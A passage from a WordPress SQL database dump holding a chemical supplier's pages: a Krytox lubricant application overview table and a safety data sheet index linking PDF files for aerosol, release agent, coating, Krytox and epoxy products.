protection.</td>\r\n<td>Typical applications include low-speed conveyor bearings that are subject to vibration, moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on the long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, non-flammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 Series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not wash away or be left behind with the grease thickener. These newly patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products are used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High-Temperature Applications</a></strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">Special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range but is designed to work best at temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. Grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range but is designed to work best at temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">Designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high-temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong>Krytox Lubricants for Specialty Applications</strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low-speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing a mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nUnderstand how Miller-Stephensons history with Krytox is ideal for your lubrication solutions:\r\n\r\nhttps://www.youtube.com/watch?v=tbzqYPsuauI\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'publish', 'closed', 'closed', '', 'krytox', '', '', '2017-06-01 17:17:51', '2017-06-01 17:17:51', '', 0, 'https://www.miller-stephenson.com/?p=2050', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2051, 10, '2016-09-28 12:43:29', '2016-09-28 12:43:29', '', '', '', 'publish', 'closed', 'closed', '', '2051', '', '', '2016-09-28 12:43:29', '2016-09-28 12:43:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/2051/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2052, 1, '2016-09-28 13:03:21', '2016-09-28 13:03:21', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 800-992-2424 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/124H.pdf">MS-124H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/111.pdf">MS-111</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AD.pdf">MS-122AD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/452N.pdf">MS-452N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AGL683.pdf">AGL 683</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/900.pdf">MS-900</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222L.pdf">MS-222L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/114C.pdf">MS-114C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADRED.pdf">MS-122AD RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/460H.pdf">MS-460H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AT.pdf">AT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905A.pdf">MS-905 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/115.pdf">MS-115</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADL.pdf">MS-122ADL</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/462H.pdf">MS-462H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/ATA.pdf">ATA</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905B.pdf">MS-905 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222T</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/182SD.pdf">MS-182SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AV.pdf">MS-122AV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/465C.pdf">MS-465C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2A45.pdf">AUT 2A45</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907A.pdf">MS-907 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222F</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126H.pdf">MS-126H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122E.pdf">MS-122E</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/467C.pdf">MS-467C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT523.pdf">AUT 523</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907B.pdf">MS-907 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242L.pdf">MS-242L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126HUV.pdf">MS-126HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ERED.pdf">MS-122E RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/470C.pdf">MS-470C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT1045.pdf">AUT 1045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908A.pdf">MS-908 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242NAS.pdf">MS-242L-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383A.pdf">MS-383A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SE.pdf">MS-122SE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/472C.pdf">MS-472C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2045.pdf">AUT 2045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908B.pdf">MS-908 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242N.pdf">MS-242N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383H.pdf">MS-383H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SD.pdf">MS-122SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/470S.pdf">MS-470S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2245.pdf">AUT 2245</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910A.pdf">MS-910 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242NAS.pdf">MS-242N-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383HUV.pdf">MS-383HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122XD.pdf">MS-122XD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/472S.pdf">MS-472S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143.pdf">143 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910B.pdf">MS-910 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381H.pdf">MS-381H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/252.pdf">MS-252</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/132FE.pdf">MS-132FE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/475C.pdf">MS-475C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL10X.pdf">GPL 10X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy48.pdf">HELOXY 48</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381H.pdf">MS-381HM</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/257.pdf">MS-257</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/136W.pdf">MS-136W</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/477C.pdf">MS-477C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL246.pdf">GPL 246</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy61.pdf">HELOXY 61</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HUV.pdf">MS-381HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/262.pdf">MS-262</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143AX.pdf">MS-143AX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/G0831B.pdf">G0831B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL255.pdf">GPL 255</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy62.pdf">HELOXY 62</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HUV.pdf">MS-381HMUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/282.pdf">MS-282</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E.pdf">MS-143E</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Y0110A.pdf">Y0110A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/157FS.pdf">157FS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy67.pdf">HELOXY 67</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HC.pdf">MS-381HC</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/532.pdf">MS-532</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E1.pdf">MS-143E-1</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL20X.pdf">GPL 20X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy68.pdf">HELOXY 68</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HC.pdf">MS-381HCM</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/539.pdf">MS-539</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E2.pdf">MS-143E-2</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL21X.pdf">GPL 21X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy71.pdf">HELOXY 71</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HCUV.pdf">MS-381HCUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/552.pdf">MS-552</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E5.pdf">MS-143E-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL22X.pdf">GPL 22X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy107.pdf">HELOXY 107</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HCUV.pdf">MS-381HCMUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/557.pdf">MS-557</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E10.pdf">MS-143E-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL226FG227FG.pdf">GPL 226FG, 227FG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy116.pdf">HELOXY 116</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/250.pdf">MS-250</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/562.pdf">MS-562</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143EBLUE.pdf">MS-143E BLUE</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/240.pdf">240 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy505.pdf">HELOXY 505</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/250.pdf">MS-250M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/582.pdf">MS-582</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143ERED.pdf">MS-143E RED</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Krytox250.pdf">250 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BisphenolA157.pdf">BISPHENOL A-157</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/250.pdf">MS-250SP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/702.pdf">MS-702</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143H.pdf">MS-143H</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Krytox280.pdf">280 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/164.pdf">EPON RESIN 164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/255.pdf">MS-255</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/722.pdf">MS-722</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143H1.pdf">MS-143H-1</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/283.pdf">283 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/SU8.pdf">EPON RESIN SU 8</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/255.pdf">MS-255M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/727.pdf">MS-727</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143H25.pdf">MS-143H-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL29X.pdf">GPL 29X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/813.pdf">EPON RESIN 813</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/260.pdf">MS-260</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/732.pdf">MS-732</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143H5.pdf">MS-143H-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL407.pdf">GPL 407</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/815C.pdf">EPON RESIN 815C</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/260.pdf">MS-260M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/739.pdf">MS-739</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143H10.pdf">MS-143H-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/EG20003000.pdf">EG 2000, 3000</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/825.pdf">EPON RESIN 825</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/280.pdf">MS-280</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/747.pdf">MS-747</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143HBLUE.pdf">MS-143H BLUE</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/FPG.pdf">FPG SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/826.pdf">EPON RESIN 826</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/530.pdf">MS-530</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/752.pdf">MS-752</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143HRED.pdf">MS-143H RED</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Lineargrease.pdf">LINEAR GREASE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/828.pdf">EPON RESIN 828</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/538.pdf">MS-538</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/752U.pdf">MS-752U</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143TE.pdf">MS-143 TE</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Linearoil.pdf">LINEAR OIL</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/830.pdf">EPON RESIN 830</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/550.pdf"> 